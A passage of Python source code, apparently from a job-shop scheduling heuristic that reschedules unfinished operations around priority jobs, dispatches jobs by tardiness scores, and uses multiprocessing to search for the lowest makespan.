ind_job_op_iter = self.ind_job_ops[op_iter]
priority_op_iter = self.priority_jobs[ind_job_op_iter]
if priority_op_iter == 0:
new_op_anchor_type_macs[machine_temp] = op_iter
# if priority_op_iter == 0:
# for ind_op_mac in range(num_op_mac_temp):
# for machine_temp in machine_status:
set_job_unfinished = []
idx_op_set_job_unfinished = []
final_idx_op_set_job_unfinished = []
job_constraint_set_job_unfinished = []
for job_inspect in ordinary_job_inspect_list:
idx_first_op_job_inspect = int( self.idx_first_op_jobs[job_inspect] )
num_op_job_inspect = int( self.num_op_jobs[job_inspect] )
for ind_op_iter_inspect in range(num_op_job_inspect):
if new_flag_scheduled_ops[int( idx_first_op_job_inspect + ind_op_iter_inspect)] != 1:
set_job_unfinished.append(job_inspect)
idx_op_set_job_unfinished.append(idx_first_op_job_inspect + ind_op_iter_inspect)
final_idx_op_set_job_unfinished.append(idx_first_op_job_inspect + num_op_job_inspect - 1)
end_time_op_prev = new_end_time_ops[int(idx_first_op_job_inspect + ind_op_iter_inspect - 1)]
if ind_op_iter_inspect != 0 and end_time_op_prev > 0:
job_constraint_set_job_unfinished.append(end_time_op_prev)
# if ind_op_iter_inspect != 0 and end_time_op_prev > 0:
break
# if new_flag_scheduled_ops[idx_first_op_job_inspect + ind_op_iter_inspect] != 1:
# for ind_op_iter_inspect in range(num_op_job_inspect):
# for job_inspect in job_inspect_list:
size_set_job_unfinished = len(set_job_unfinished)
while size_set_job_unfinished > 0:
ind_set_op_earliest = np.argmin(job_constraint_set_job_unfinished)
op_earliest = idx_op_set_job_unfinished[ind_set_op_earliest] # int( )
if new_flag_scheduled_ops[op_earliest] == 1:
print('unexpected scheduled operation')
# if new_flag_scheduled_ops[op_earliest] == 1:
mac_op_earliest = self.mac_assignment_ops[op_earliest]
ind_job_op_earliest = self.ind_job_ops[op_earliest]
job_type_op_earliest = self.type_jobs[ind_job_op_earliest]
ind_op_op_earliest = self.ind_op_ops[op_earliest]
process_time_op_earliest = self.job_types[job_type_op_earliest][ind_op_op_earliest]['process_time']
mac_type_op_earliest = self.machine_type_ops[op_earliest]
if self.flag_mac_available[mac_op_earliest] == 0:
ind_mac_selected_type_macs = np.argmin(new_ready_time_type_macs[mac_type_op_earliest] + available_mac_offset[mac_type_op_earliest])
mac_op_earliest = self.machines[mac_type_op_earliest][ind_mac_selected_type_macs]
# if self.flag_mac_available[mac_op_earliest] == 0:
# mac_type_op_earliest = machine_status[mac_op_earliest]['type']
ind_mac_op_earliest = self.hash_ind_mac_types[mac_op_earliest]
start_time_candidate = job_constraint_set_job_unfinished[ind_set_op_earliest]
if start_time_candidate < new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest]:
start_time_candidate = new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest]
# new_start_time_ops[op_earliest] < new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest]
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if new_start_time_ops[op_earliest] < cur_time:
pos_insert_op_schedule = pos_insertion_macs[mac_op_earliest]
op_priority_ref = op_priority_ref_macs[mac_op_earliest]
while op_priority_ref != -1:
max_pend_time_op_priority_ref = self.max_pend_time_ops[op_priority_ref]
if start_time_candidate + process_time_op_earliest <= new_start_time_ops[op_priority_ref]:
break
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
ind_job_priority = self.ind_job_ops[op_priority_ref]
ind_op_op_priority = self.ind_op_ops[op_priority_ref]
job_constraint_op_priority = self.arrival_time_jobs[ind_job_priority]
if ind_op_op_priority > 0:
job_constraint_op_priority = new_end_time_ops[op_priority_ref - 1]
# if ind_op_op_priority > 0:
if start_time_candidate < new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_op_earliest > new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_op_earliest <= job_constraint_op_priority + max_pend_time_op_priority_ref * self.perc_pend_time:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial = self.postpone_operation(cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_op_earliest, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, new_ready_time_type_macs, new_mac_assignment_ops, new_op_seq_machines, new_op_anchor_type_macs)
if sentinel_feasible == True:
new_start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
new_end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
new_start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
new_end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
new_ready_time_type_macs = ready_time_type_macs_trial # copy.deepcopy(ready_time_type_macs)
break
# if sentinel_feasible == True:
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref] + max_pend_time_op_priority_ref:
if new_end_time_ops[op_priority_ref] > start_time_candidate:
start_time_candidate = new_end_time_ops[op_priority_ref]
# if end_time_ops[op_priority_ref] > start_time_candidate:
pos_insert_op_schedule = pos_insert_op_schedule + 1
while pos_insert_op_schedule < len(new_op_seq_machines[mac_op_earliest]):
op_temp = new_op_seq_machines[mac_op_earliest][pos_insert_op_schedule]
ind_job_op_temp = int( self.ind_job_ops[op_temp] )
job_temp = self.name_jobs[ind_job_op_temp]
if job_status[job_temp]['priority'] > 0:
op_priority_ref = op_temp
break
# if job_status[job_temp]['priority'] > 0:
pos_insert_op_schedule = pos_insert_op_schedule + 1
# while pos_insert_op_schedule < len(op_seq_machines[mac_op_earliest])
if pos_insert_op_schedule >= len(new_op_seq_machines[mac_op_earliest]):
op_priority_ref = -1
break
# if pos_insert_op_schedule >= len(op_seq_machines[mac_op_earliest]):
# while op_priority_ref != -1:
pos_insertion_macs[mac_op_earliest] = pos_insert_op_schedule
op_priority_ref_macs[mac_op_earliest] = op_priority_ref
new_start_time_ops[op_earliest] = start_time_candidate
new_end_time_ops[op_earliest] = new_start_time_ops[op_earliest] + process_time_op_earliest # self.job_types[job_type_init][ind_op_job_temp]['process_time']
new_op_seq_machines[mac_op_earliest].insert(pos_insert_op_schedule, op_earliest)
new_job_seq_machines[mac_op_earliest].insert(pos_insert_op_schedule, self.name_jobs[ind_job_op_earliest])
new_start_time_op_macs[mac_op_earliest].insert(pos_insert_op_schedule, new_start_time_ops[op_earliest])
new_end_time_op_macs[mac_op_earliest].insert(pos_insert_op_schedule, new_end_time_ops[op_earliest])
new_ready_time_type_macs[mac_type_op_earliest][ind_mac_op_earliest] = new_end_time_ops[op_earliest]
new_scheduled_length_mac_types[mac_type_op_earliest] = new_scheduled_length_mac_types[mac_type_op_earliest] + process_time_op_earliest
new_op_anchor_type_macs[mac_op_earliest] = op_earliest
new_mac_assignment_ops[op_earliest] = mac_op_earliest
new_flag_scheduled_ops[op_earliest] = 1
pos_insertion_macs[mac_op_earliest] = pos_insertion_macs[mac_op_earliest] + 1
if op_earliest == final_idx_op_set_job_unfinished[ind_set_op_earliest]:
set_job_unfinished.pop(ind_set_op_earliest)
idx_op_set_job_unfinished.pop(ind_set_op_earliest)
final_idx_op_set_job_unfinished.pop(ind_set_op_earliest)
job_constraint_set_job_unfinished.pop(ind_set_op_earliest)
else:
# op_suc_earliest = op_earliest + 1
idx_op_set_job_unfinished[ind_set_op_earliest] = op_earliest + 1
job_constraint_set_job_unfinished[ind_set_op_earliest] = new_end_time_ops[op_earliest]
# if op_earliest == final_idx_op_set_job_unfinished[ind_set_op_earliest]:
size_set_job_unfinished = len(set_job_unfinished)
# while size_set_job_unfinished > 0:
#---------------- Division ----------------#
new_total_length_machine_type = self.total_length_machine_type.copy()
average_length_machine_type = {}
max_average_length = -1
# mac_type_max_average_length = None
for machine_type_temp in self.machines:
new_total_length_machine_type[machine_type_temp] = new_total_length_machine_type[machine_type_temp] + sum( cumul_pend_time_type_macs[machine_type_temp] )
for ind_mac_type_temp in range(self.num_machine_available_types[machine_type_temp]):
machine_temp = self.machines[machine_type_temp][ind_mac_type_temp]
if self.flag_mac_available[machine_temp] == 0:
new_total_length_machine_type[machine_type_temp] = new_total_length_machine_type[machine_type_temp] - cumul_pend_time_type_macs[machine_type_temp][ind_mac_type_temp]
# if self.flag_mac_available[machine_temp] == 0:
# for ind_mac_type_temp in range(self.num_machine_available_types[machine_type_temp]):
coeff_temp = 1.0 # + ind_mac_type_temp / 10.0
average_length_machine_type[machine_type_temp] = new_total_length_machine_type[machine_type_temp] * coeff_temp / self.num_machine_available_types[machine_type_temp]
if average_length_machine_type[machine_type_temp] > max_average_length:
max_average_length = average_length_machine_type[machine_type_temp]
# mac_type_max_average_length = machine_type_temp
# if average_length_machine_type[machine_type_temp] > max_average_length:
# for machine_type_temp in self.machines:
num_left_job = np.zeros(self.num_job_types)
for ind_job_type in range(self.num_job_types):
job_type_temp = self.keys_job_types[ind_job_type]
num_left_job[ind_job_type] = self.num_jobs_type_idx[job_type_temp] - self.num_type_job_priority[ind_job_type] - num_scheduled_jobs_per_type[job_type_temp]
if num_left_job[ind_job_type] < 0:
print('incorrect number of jobs')
# if num_dispatch_temp < 0:
# for ind_job_type in range(self.num_job_types):
#---------------- Dispatch ----------------#
for machine_temp in machine_status:
num_op_mac_temp = len(new_op_seq_machines[machine_temp])
# ind_last_ordinary_op = 0
for ind_op_mac in range(num_op_mac_temp):
op_iter = new_op_seq_machines[machine_temp][ind_op_mac]
ind_job_op_iter = self.ind_job_ops[op_iter]
priority_op_iter = self.priority_jobs[ind_job_op_iter]
if priority_op_iter == 0:
new_op_anchor_type_macs[machine_temp] = op_iter
# if priority_op_iter == 0:
# for ind_op_mac in range(num_op_mac_temp):
# for machine_temp in machine_status:
while np.sum(new_flag_scheduled_jobs) < self.num_job:
# machine set
mac_available_set = {}
ind_mac_available_set = {}
buffer_macs = {}
ready_time_comp = -1
# idx_mac_max_length = -1
for machine_type_temp in self.machines:
ind_mac_type_mac = np.argmin( new_ready_time_type_macs[machine_type_temp] + available_mac_offset[machine_type_temp] )
mac_selected_temp = self.machines[machine_type_temp][ind_mac_type_mac]
mac_available_set[machine_type_temp] = mac_selected_temp
ind_mac_available_set[machine_type_temp] = ind_mac_type_mac
if ready_time_comp == -1:
buffer_macs[machine_type_temp] = 0
ready_time_comp = new_ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
else:
ready_time_cur = new_ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
buffer_macs[machine_type_temp] = ready_time_cur - ready_time_comp
ready_time_comp = ready_time_cur
# if ready_time_comp == -1:
# for machine_temp in self.machines:
# grade the type of jobs
status_job = 3 * np.ones(self.num_job_types)
score_job = np.zeros((self.num_job_types, 2))
for ind_job_type in range(self.num_job_types):
if num_left_job[ind_job_type] <= 0:
continue
# if num_job_dispatch_mac[idx_mac_max_length, ind_job_type] <= 0:
job_type_temp = self.keys_job_types[ind_job_type]
# sentinel_tardiness = False
score_tardiness = np.zeros(self.num_kind_mac)
score_comb = np.zeros(self.num_kind_mac)
job_constraint_score = 0
for ind_op_temp in range(self.num_kind_mac):
mac_type_cur = self.keys_mac_types[ind_op_temp]
idx_mac_cur = ind_mac_available_set[mac_type_cur]
mac_score = mac_available_set[mac_type_cur]
process_time_cur_mac = self.process_time_mac_jobs[mac_type_cur][job_type_temp]
if process_time_cur_mac == -1:
process_time_cur_mac = 0
# if process_time_cur_mac == -1:
urgence_coeff_temp = (1.0 + ind_op_temp * 0.2) * (new_total_length_machine_type[mac_type_cur] - new_scheduled_length_mac_types[mac_type_cur]) / self.num_machine_available_types[mac_type_cur]
start_time_score = job_constraint_score
if start_time_score < new_ready_time_type_macs[mac_type_cur][idx_mac_cur]:
start_time_score = new_ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score < ready_time_type_macs[mac_type_cur][idx_mac_cur]:
tardiness_temp = start_time_score - new_ready_time_type_macs[mac_type_cur][idx_mac_cur]
op_priority_score = op_priority_ref_macs[mac_score]
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
if start_time_score + process_time_cur_mac > new_start_time_ops[op_priority_score] + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
start_time_score = new_end_time_ops[op_priority_score]
tardiness_temp = new_start_time_ops[op_priority_score] - new_ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score + process_time_cur_mac < start_time_ops[op_priority_score]:
# if op_priority_score != -1
if tardiness_temp > 0:
# sentinel_tardiness = True
score_tardiness[ind_op_temp] = - tardiness_temp * urgence_coeff_temp
# else:
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
length_left = new_start_time_ops[op_priority_score] - start_time_score - process_time_cur_mac
if length_left > 0:
if length_left < self.length_comb_macs[mac_type_cur][0]:
score_comb[ind_op_temp] = - length_left * urgence_coeff_temp
elif length_left < self.max_length_comb:
idx_plus = -1
for ind_length_comb in range(len(self.length_comb_macs[mac_type_cur])):
if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
idx_plus = ind_length_comb
break
# end if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
# end for ind_length_comb in len(self.length_comb_macs[mac_type_cur]):
if idx_plus == 0:
print('incorrect index')
elif idx_plus != -1:
length_plus = self.length_comb_macs[mac_type_cur][idx_plus]
length_minus = self.length_comb_macs[mac_type_cur][idx_plus-1]
if length_left > length_minus + 0.1 * self.perc_pend_time * max_pend_time_op_priority_score:
score_comb[ind_op_temp] = - (length_plus - length_left) * urgence_coeff_temp
# end if length_left > length_minus + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
# end if idx_plus == 0 or idx_plus == -1:
# end if length_left < self.length_comb_macs[mac_type_cur][0]:
# if length_left > 0:
# if op_priority_score != -1
# if tardiness_temp > 0:
job_constraint_score = start_time_score + process_time_cur_mac
# for ind_op_temp in range(1, num_op_job_temp):
status_job[ind_job_type] = 2
score_job[ind_job_type, 1] = coeff_tardiness * np.sum(score_tardiness) + np.sum(score_comb)
# for ind_job_type in range(self.num_job_types):
# select the type of job
# idx_mac_job_group = idx_mac_max_length
idx_job_type_selected = -1
ind_job_selected = -1
# idx_job_type_first_arrive = -1
# sentinel_job_type = np.zeros(self.num_job_types)
idx_job_type_selected = -1
for ind_job_type in range(self.num_job_types):
if status_job[ind_job_type] >= 3: # or sentinel_job_type[ind_job_type] == 1
continue
# if status_job[ind_job_type] >= 4:
if idx_job_type_selected == -1:
idx_job_type_selected = ind_job_type
else: # if idx_job_type_selected != -1:
if status_job[ind_job_type] < status_job[idx_job_type_selected]:
idx_job_type_selected = ind_job_type
else:
if status_job[ind_job_type] == status_job[idx_job_type_selected]:
if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
# if status_job[ind_job_type] == status_job[idx_job_type_selected]:
# if status_job[ind_job_type] < status_job[idx_job_type_selected]:
# if idx_job_type_selected == -1:
# for ind_job_type in range(self.num_job_types):
if idx_job_type_selected == -1:
print('No proper job type')
# if idx_job_type_selected == -1:
# determine the exact job to be arranged
job_type_selected = self.keys_job_types[idx_job_type_selected]
idx_job_base = self.idx_first_job_types[job_type_selected]
job_name_selected = None
for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if new_flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1:
continue
# if flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1 or self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > 0:
continue
# if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if ind_job_selected == -1:
ind_job_selected = ind_job_selected_type + idx_job_base
job_name_selected = self.name_jobs[ind_job_selected]
break
# if ind_job_selected == -1:
# for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if job_type_selected != self.type_jobs[ind_job_selected]:
print('check job type')
# if job_type_selected != self.type_jobs[ind_job_selected]:
if ind_job_selected == -1:
print('No proper job')
# if ind_job_selected == -1:
# dispatch
job_constraint_temp = self.arrival_time_jobs[ind_job_selected]
ind_first_op_temp = self.idx_first_op_jobs[ind_job_selected]
job_name_selected = self.name_jobs[ind_job_selected]
num_op_temp = int( self.num_op_jobs[ind_job_selected] )
for ind_op_job_temp in range(num_op_temp):
ind_op_schedule = int( ind_first_op_temp + ind_op_job_temp )
mac_type_temp = self.machine_type_ops[ind_op_schedule]
process_time_temp = self.job_types[job_type_selected][ind_op_job_temp]['process_time']
ind_mac_type_mac_temp = ind_mac_available_set[mac_type_temp]
mac_name_temp = mac_available_set[mac_type_temp]
# determine the start time
start_time_candidate = job_constraint_temp
if job_constraint_temp < new_ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
start_time_candidate = new_ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]
# if job_constraint_temp < ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if start_time_candidate < cur_time:
pos_insert_op_schedule = pos_insertion_macs[mac_name_temp]
op_priority_ref = op_priority_ref_macs[mac_name_temp]
while op_priority_ref != -1:
max_pend_time_op_priority_ref = self.max_pend_time_ops[op_priority_ref]
if start_time_candidate + process_time_temp <= new_start_time_ops[op_priority_ref]:
break
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
ind_job_priority = self.ind_job_ops[op_priority_ref]
ind_op_op_priority = self.ind_op_ops[op_priority_ref]
job_constraint_op_priority = self.arrival_time_jobs[ind_job_priority]
if ind_op_op_priority > 0:
job_constraint_op_priority = new_end_time_ops[op_priority_ref - 1]
# if ind_op_op_priority > 0:
if start_time_candidate < new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp > new_start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp <= job_constraint_op_priority + max_pend_time_op_priority_ref * self.perc_pend_time:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial = self.postpone_operation(cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, new_ready_time_type_macs, new_mac_assignment_ops, new_op_seq_machines, new_op_anchor_type_macs)
if sentinel_feasible == True:
new_start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
new_end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
new_start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
new_end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
new_ready_time_type_macs = ready_time_type_macs_trial # copy.deepcopy(ready_time_type_macs)
break
# if sentinel_feasible == True:
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref] + max_pend_time_op_priority_ref:
if new_end_time_ops[op_priority_ref] > start_time_candidate:
start_time_candidate = new_end_time_ops[op_priority_ref]
# if end_time_ops[op_priority_ref] > start_time_candidate:
pos_insert_op_schedule = pos_insert_op_schedule + 1
while pos_insert_op_schedule < len(new_op_seq_machines[mac_name_temp]):
op_temp = new_op_seq_machines[mac_name_temp][pos_insert_op_schedule]
ind_job_op_temp = int( self.ind_job_ops[op_temp] )
job_temp = self.name_jobs[ind_job_op_temp]
if job_status[job_temp]['priority'] > 0:
op_priority_ref = op_temp
break
# if job_status[job_temp]['priority'] > 0:
pos_insert_op_schedule = pos_insert_op_schedule + 1
# while pos_insert_op_schedule < len(op_seq_machines[mac_name_temp])
if pos_insert_op_schedule >= len(new_op_seq_machines[mac_name_temp]):
op_priority_ref = -1
break
# if pos_insert_op_schedule >= len(op_seq_machines[mac_name_temp]):
# while op_priority_ref != -1:
pos_insertion_macs[mac_name_temp] = pos_insert_op_schedule
op_priority_ref_macs[mac_name_temp] = op_priority_ref
new_start_time_ops[ind_op_schedule] = start_time_candidate
new_end_time_ops[ind_op_schedule] = new_start_time_ops[ind_op_schedule] + process_time_temp # self.job_types[job_type_init][ind_op_job_temp]['process_time']
new_op_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, ind_op_schedule)
new_job_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, job_name_selected)
new_start_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, new_start_time_ops[ind_op_schedule])
new_end_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, new_end_time_ops[ind_op_schedule])
new_ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp] = new_end_time_ops[ind_op_schedule]
new_op_anchor_type_macs[mac_name_temp] = ind_op_schedule
new_scheduled_length_mac_types[mac_type_temp] = new_scheduled_length_mac_types[mac_type_temp] + process_time_temp
new_mac_assignment_ops[ind_op_schedule] = mac_name_temp
new_flag_scheduled_ops[ind_op_schedule] = 1
pos_insertion_macs[mac_name_temp] = pos_insertion_macs[mac_name_temp] + 1
job_constraint_temp = new_end_time_ops[ind_op_schedule]
# for ind_op_job_temp in range(num_op_temp):
new_flag_scheduled_jobs[ind_job_selected] = 1
num_left_job[idx_job_type_selected] = num_left_job[idx_job_type_selected] - 1
if num_left_job[idx_job_type_selected] < 0: # group_job_mac[idx_mac_job_group, idx_job_type_selected] > 0:
print('incorrect number of job')
# if num_left_job[idx_job_type_selected] < 0:
# while np.sum(flag_scheduled_jobs) < self.num_job:
#---------------- Recording ----------------#
op_max_end_time = np.argmax(new_end_time_ops)
makespan = new_end_time_ops[op_max_end_time] # np.max(end_time_ops)
return makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs
# def generation_resume():
def init_construction(self, job_status, job_list, machine_status, cur_time):
#---------------- Preparation ----------------#
num_job = len(job_status)
self.flag_mac_available = {}
for mac_name_temp in machine_status:
self.flag_mac_available[mac_name_temp] = 1
# for mac_name_temp in machine_status:
name_jobs = []
idx_first_job_types = {}
type_jobs = []
num_op_jobs = np.zeros(num_job)
arrival_time_jobs = []
priority_jobs = []
idx_first_op_jobs = -1 * np.ones(num_job)
ind_job_ops = []
ind_op_ops = []
machine_type_ops = []
max_pend_time_ops = []
process_time_ops = []
arrival_jobs_priority = {}
priority_jobs_priority = {}
idx_set_job_priority = {}
num_type_job_priority = np.zeros(self.num_job_types)
set_job_priority = []
size_set_job_priority = 0
total_num_ops = 0
type_record = None
ind_job = 0
for job in job_status:
name_jobs.append(job)
type_temp = job_status[job]['type']
if type_record == None or type_temp != type_record:
type_record = type_temp
idx_first_job_types[type_record] = ind_job
# if type_record == None or type_temp != type_record:
type_jobs.append(type_temp)
num_op_temp = self.num_op_job_types[type_temp]
num_op_jobs[ind_job] = int( num_op_temp )
arrival_time_jobs.append(job_status[job]['arrival'])
priority_jobs.append(job_status[job]['priority'])
idx_first_op_jobs[ind_job] = total_num_ops
for ind_op_temp in range(num_op_temp):
ind_job_ops.append(ind_job)
ind_op_ops.append(ind_op_temp)
machine_type_ops.append(self.job_types[type_temp][ind_op_temp]['machine_type'])
max_pend_time_ops.append(self.job_types[type_temp][ind_op_temp]['max_pend_time'])
process_time_ops.append(self.job_types[type_temp][ind_op_temp]['process_time'])
# for ind_op_temp in range(num_op_temp):
if job_status[job]['priority'] > 0:
arrival_jobs_priority[job] = job_status[job]['arrival']
priority_jobs_priority[job] = job_status[job]['priority']
idx_set_job_priority[job] = ind_job
idx_type_temp = self.hash_ind_job_types[type_temp]
num_type_job_priority[idx_type_temp] = num_type_job_priority[idx_type_temp] + 1
idx_pos_job_priority = 0
for ind_job_priority in range(size_set_job_priority):
job_comp = set_job_priority[ind_job_priority]
if arrival_jobs_priority[job_comp] >= arrival_jobs_priority[job]:
break
# if arrival_jobs_priority[job_comp] >= arrival_jobs_priority[job]:
idx_pos_job_priority = idx_pos_job_priority + 1
# for ind_job_priority in range(size_set_job_priority):
set_job_priority.insert(idx_pos_job_priority, job)
size_set_job_priority = size_set_job_priority + 1
# if job_status[job]['priority'] > 0:
total_num_ops = total_num_ops + num_op_temp
ind_job = ind_job + 1
# for job in job_status:
num_jobs_type_idx = {}
for ind_job in range(num_job):
if type_jobs[ind_job] in num_jobs_type_idx:
num_jobs_type_idx[ type_jobs[ind_job] ] = num_jobs_type_idx[ type_jobs[ind_job] ] + 1
else:
num_jobs_type_idx[ type_jobs[ind_job] ] = 1
# if type_jobs[ind_job] in num_jobs_type_idx:
# for ind_job in range(num_job):
num_machine_available_types = {}
num_op_mac_jobs = {}
total_length_machine_type = {}
# average_length_machine_type = {}
# max_average_length = -1
# mac_type_max_average_length = None
for machine_temp in self.machines:
num_machine_available_types[machine_temp] = len(self.machines[machine_temp])
num_op_mac_jobs[machine_temp] = {}
total_length_machine_type[machine_temp] = 0
for key_job_type in self.key_dict_job_types:
if self.process_time_mac_jobs[machine_temp][key_job_type] != -1:
total_length_machine_type[machine_temp] = total_length_machine_type[machine_temp] + num_jobs_type_idx[key_job_type] * self.process_time_mac_jobs[machine_temp][key_job_type]
num_op_mac_jobs[machine_temp][key_job_type] = num_jobs_type_idx[key_job_type]
else:
num_op_mac_jobs[machine_temp][key_job_type] = 0
# if processing_time_temp != -1:
# for key_job_type in key_dict_job_types:
# coeff_temp = 1.0 # + ind_mac_type_temp / 10.0
# average_length_machine_type[machine_temp] = total_length_machine_type[machine_temp] * coeff_temp / num_machine_available_types[machine_temp]
# if average_length_machine_type[machine_temp] > max_average_length:
# max_average_length = average_length_machine_type[machine_temp]
# mac_type_max_average_length = machine_temp
# # if average_length_machine_type[machine_temp] > max_average_length:
# for machine_temp in self.machines:
self.mac_set_breakdown = []
self.total_num_ops = total_num_ops
self.num_job = num_job
self.num_op_jobs = num_op_jobs
self.idx_first_job_types = idx_first_job_types
self.name_jobs = name_jobs
self.arrival_time_jobs = arrival_time_jobs
self.priority_jobs = priority_jobs
self.ind_job_ops = ind_job_ops
self.ind_op_ops = ind_op_ops
self.type_jobs = type_jobs
self.machine_type_ops = machine_type_ops
self.idx_first_op_jobs = idx_first_op_jobs
self.num_jobs_type_idx = num_jobs_type_idx
self.num_machine_available_types = num_machine_available_types
self.num_op_mac_jobs = num_op_mac_jobs
self.total_length_machine_type = total_length_machine_type
self.max_pend_time_ops = max_pend_time_ops
self.process_time_ops = process_time_ops
self.set_job_priority = set_job_priority
self.idx_set_job_priority = idx_set_job_priority
self.arrival_jobs_priority = arrival_jobs_priority
self.priority_jobs_priority = priority_jobs_priority
self.size_set_job_priority = size_set_job_priority
self.num_type_job_priority = num_type_job_priority
# coeff_tardiness = 0.5
# start_time = time.time()
manager = multiprocessing.Manager()
makespan_ct_dict = manager.dict()
data_ct_dict = manager.dict()
jobs_ct = []
# set_coeff_tardiness = [1.0, 0.5, 0.2, 0.1, 0.05, 0.01]
for ind_process in range(6):
proc = multiprocessing.Process(target=process_generate_scratch, args=(self, cur_time, job_status, machine_status, self.set_coeff_tardiness[ind_process], makespan_ct_dict, data_ct_dict))
jobs_ct.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_ct:
proc.join()
# for proc in jobs:
ct_min_makespan = min(makespan_ct_dict ,key = makespan_ct_dict.get)
makespan_best = makespan_ct_dict[ct_min_makespan]
op_seq_machines_best, job_seq_machines_best, start_time_op_macs_best, end_time_op_macs_best, start_time_ops_best, end_time_ops_best, mac_assignment_ops_best, flag_scheduled_ops_best, flag_scheduled_jobs_best = data_ct_dict[ct_min_makespan]
coeff_tardiness_best = ct_min_makespan
#print(makespan_ct_dict.values())
#print(ct_min_makespan)
#print(makespan_ct_dict[ct_min_makespan])
if min(self.num_machine_types.values()) > 2:
makespan_rnd_dict = manager.dict()
data_rnd_dict = manager.dict()
jobs_rnd = []
for ind_process in range(6):
proc = multiprocessing.Process(target=process_iteration_scratch, args=(self, ind_process, cur_time, job_status, machine_status, coeff_tardiness_best, makespan_best, makespan_rnd_dict, data_rnd_dict))
jobs_rnd.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_rnd:
proc.join()
# for proc in jobs:
ind_rnd_min_makespan = min(makespan_rnd_dict ,key = makespan_rnd_dict.get)
if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
makespan_best = makespan_rnd_dict[ind_rnd_min_makespan]
op_seq_machines_best, job_seq_machines_best, start_time_op_macs_best, end_time_op_macs_best, start_time_ops_best, end_time_ops_best, mac_assignment_ops_best, flag_scheduled_ops_best, flag_scheduled_jobs_best = data_rnd_dict[ind_rnd_min_makespan]
# if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
# if len(machine_status > 12):
# makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = self.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness)
# elapsed_time = (time.time() - start_time)
# print(elapsed_time)
# self.group_job_mac = group_job_mac
self.op_seq_machines = op_seq_machines_best
self.job_seq_machines = job_seq_machines_best
self.start_time_op_macs = start_time_op_macs_best
self.end_time_op_macs = end_time_op_macs_best
self.start_time_ops = start_time_ops_best
self.end_time_ops = end_time_ops_best
self.mac_assignment_ops = mac_assignment_ops_best
self.flag_scheduled_ops = flag_scheduled_ops_best
self.flag_scheduled_jobs = flag_scheduled_jobs_best
self.count_scheduled_op_macs = {}
